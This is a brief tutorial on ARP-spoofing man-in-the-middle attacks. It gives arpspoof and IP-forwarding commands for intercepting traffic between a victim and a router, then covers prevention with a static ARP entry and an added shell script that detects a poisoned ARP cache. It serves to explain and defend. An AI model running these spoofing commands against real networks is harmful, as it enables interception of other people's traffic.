Supposing we've installed a Linux system with the dsniff tools, we have to enable routing in the system's kernel:
sysctl -w net.ipv4.ip_forward=1
We have to create two different processes to establish the connection between the two machines (router and victim) and us:
arpspoof -i eth0 ROUTER_IP_ADDRESS -t VICTIM_IP_ADDRESS
arpspoof -i eth0 VICTIM_IP_ADDRESS -t ROUTER_IP_ADDRESS
Now we can run Wireshark (a packet analyzer) and view the information encapsulated in the IP packets sent between router and victim.
As this technique is a "man in the middle" (we are between victim and router), we can also learn the encrypted information that protocols like HTTPS (SSL) or SSH carry; we only have to emulate a secure server. The victim's client then shows a certificate or host-key warning, because the emulated server cannot present the real server's key.
How to prevent it
First we have to know the router's hardware address (MAC); to find it, we can look in our ARP table for the router's entry with:
arp
Once we know the MAC, we have to manually add a permanent ARP entry with the following command:
arp -s ROUTER_IP_ADDRESS ROUTER_HW_ADDRESS
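
To verify that the permanent entry is in place and the cache has not been poisoned, here is an added example (not part of the original page): a shell function that reads a table in the Linux /proc/net/arp format and reports a router entry that differs from the known MAC, a router entry that is not permanent, or one MAC answering for two IP addresses. The function name check_arp and every address in the sample tables are assumptions made up for the example.

```shell
#!/bin/sh
# Added example; every address below is a constructed sample value.
# check_arp ROUTER_IP ROUTER_MAC reads a /proc/net/arp style table on stdin,
# prints one line per finding and returns 0 if clean, 1 otherwise.
check_arp() {
    awk -v rip="$1" -v rmac="$2" '
    BEGIN { rmac = tolower(rmac) }
    NR == 1 { next }                       # column header
    $4 == "00:00:00:00:00:00" { next }     # unresolved entry
    {
        ip = $1; flags = $3; mac = tolower($4)
        if (ip == rip) {
            seen = 1
            if (mac != rmac) {
                print "MISMATCH " ip " is at " mac ", expected " rmac; bad = 1
            } else if (flags != "0x6") {   # 0x6 = complete + permanent (arp -s)
                print "NOT_PERMANENT " ip " can still be overwritten"; bad = 1
            }
        }
        # One MAC answering for two IPs is what a poisoned cache looks like.
        if ((mac in owner) && owner[mac] != ip) {
            print "DUPLICATE " mac " claims " owner[mac] " and " ip; bad = 1
        } else owner[mac] = ip
    }
    END {
        if (!seen) { print "MISSING " rip; bad = 1 }
        exit bad + 0
    }'
}

sample_spoofed() { cat <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         de:ad:be:ef:00:01     *        eth0
192.168.1.66     0x1         0x2         de:ad:be:ef:00:01     *        eth0
EOF
}
sample_pinned() { cat <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x6         00:11:22:33:44:55     *        eth0
192.168.1.20     0x1         0x2         00:11:22:33:44:99     *        eth0
EOF
}

sample_spoofed | check_arp 192.168.1.1 00:11:22:33:44:55 || echo "-> cache is poisoned"
sample_pinned  | check_arp 192.168.1.1 00:11:22:33:44:55 && echo "-> router entry pinned and intact"
```

On a real machine the table comes from the kernel: check_arp ROUTER_IP_ADDRESS ROUTER_HW_ADDRESS < /proc/net/arp. A DUPLICATE line can also come from a legitimate host with several addresses on one interface, so confirm it before acting.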